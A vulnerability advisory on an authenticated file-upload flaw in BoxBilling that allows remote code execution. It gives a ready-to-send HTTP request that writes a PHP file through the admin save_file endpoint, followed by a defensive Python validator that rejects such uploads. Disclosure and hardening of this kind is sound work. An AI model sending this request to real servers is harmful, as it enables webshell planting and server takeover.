
BoxBilling <=4.22.1.5 - Authenticated Unrestricted File Upload - RCE

2022-09-18 11:31:02
zetc0de
www.huntr.dev

EPSS: 0.017 (Low)

EPSS Percentile: 87.7%

Description

BoxBilling was vulnerable to Unrestricted File Upload. To exploit the vulnerability, an attacker must hold a valid authenticated admin session on the CMS. With at least one product order present, the attacker can upload a malicious file containing a webshell through a hidden API endpoint and obtain RCE.

Proof of Concept

POST /index.php?_url=/api/admin/Filemanager/save_file HTTP/1.1
Host: local.com:8089
Content-Length: 52
Accept: application/json, text/javascript, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=3nrf9i4mv28o5anva77ltq042d
Connection: close

order_id=1&path=ax.php&data=<%3fphp+phpinfo()%3b%3f>

Video PoC:

https://drive.google.com/file/d/1m2glCeJ9QXc8epuY2QfvbWwjLTJ8_Hjx/view?usp=sharing
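The following server-side validation is an added example (not BoxBilling's code) showing the checks a file-manager "save_file" endpoint needs so that the request above is refused: it parses the form body, enforces an extension allow-list that excludes server-executable types, and confines the write to the order's own directory. The base directory, the allow-list and the function name are assumptions.

```python
# Added example, not BoxBilling's code: input validation for an admin
# file-manager "save" endpoint. BASE_DIR and ALLOWED_EXTENSIONS are assumptions.
from pathlib import Path
from urllib.parse import parse_qs

ALLOWED_EXTENSIONS = {".txt", ".html", ".css", ".md"}   # assumption: no executable types
BASE_DIR = Path("/var/www/boxbilling/uploads")          # assumption: per-order storage root


def validate_save_request(body: str) -> tuple[bool, str]:
    """Parse an application/x-www-form-urlencoded body (order_id, path, data)
    and decide whether the requested write is acceptable.
    Returns (accepted, reason_or_target_path)."""
    params = parse_qs(body, keep_blank_values=True)
    order_id = params.get("order_id", [""])[0]
    rel_path = params.get("path", [""])[0]

    if not order_id.isdigit():
        return False, "order_id must be numeric"
    if not rel_path:
        return False, "path is required"

    # Reject any PHP-family extension anywhere in the name, which also covers
    # double extensions such as "shell.php.txt" and variants like ".phtml".
    suffixes = [s.lower() for s in Path(rel_path).suffixes]
    if any(s.startswith(".ph") for s in suffixes):
        return False, f"disallowed extension in {rel_path!r}"
    if not suffixes or suffixes[-1] not in ALLOWED_EXTENSIONS:
        return False, f"extension not in allow-list: {rel_path!r}"

    # Confine the write to the order's directory: no traversal, no absolute paths.
    order_dir = (BASE_DIR / order_id).resolve()
    target = (order_dir / rel_path).resolve()
    if order_dir not in target.parents:
        return False, "path escapes the order directory"
    return True, str(target)


if __name__ == "__main__":
    # Constructed inputs: the PoC body from the advisory, then a benign request.
    for body in ("order_id=1&path=ax.php&data=<%3fphp+phpinfo()%3b%3f>",
                 "order_id=1&path=notes.txt&data=hello"):
        print(validate_save_request(body))
```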
